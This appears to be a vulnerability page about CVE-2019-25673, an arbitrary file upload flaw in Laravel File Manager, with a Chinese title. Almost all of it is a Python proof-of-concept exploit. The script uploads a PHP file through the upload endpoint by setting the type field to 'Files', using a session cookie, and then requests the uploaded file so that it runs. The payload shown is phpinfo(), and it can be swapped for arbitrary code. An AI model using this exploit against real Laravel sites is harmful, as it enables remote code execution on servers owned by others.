CVE-2019-25673 Laravel File Manager任意文件上传漏洞

import requests # Target configuration target_host = "http://example.com" upload_url = f"{target_host}/laravel-filemanager/upload" # Attacker's session cookie (authentication required) session_cookie = "laravel_session=attacker_session_value" headers = { "Cookie": session_cookie } # Multipart form data # The vulnerability allows uploading PHP by setting type to 'Files' files = { "file": ("exploit.php", "<?php phpinfo(); ?>", "application/octet-stream") } data = { "type": "Files" } # 1. Upload the malicious file response = requests.post(upload_url, files=files, data=data, headers=headers) if response.status_code == 200: print("[+] File uploaded successfully.") # 2. Access the uploaded file to trigger execution # Note: The exact path depends on the configuration, often /storage or /user/files exploit_url = f"{target_host}/user/files/exploit.php" exec_response = requests.get(exploit_url) print(f"[+] Execution status: {exec_response.status_code}") else: print("[-] Upload failed.")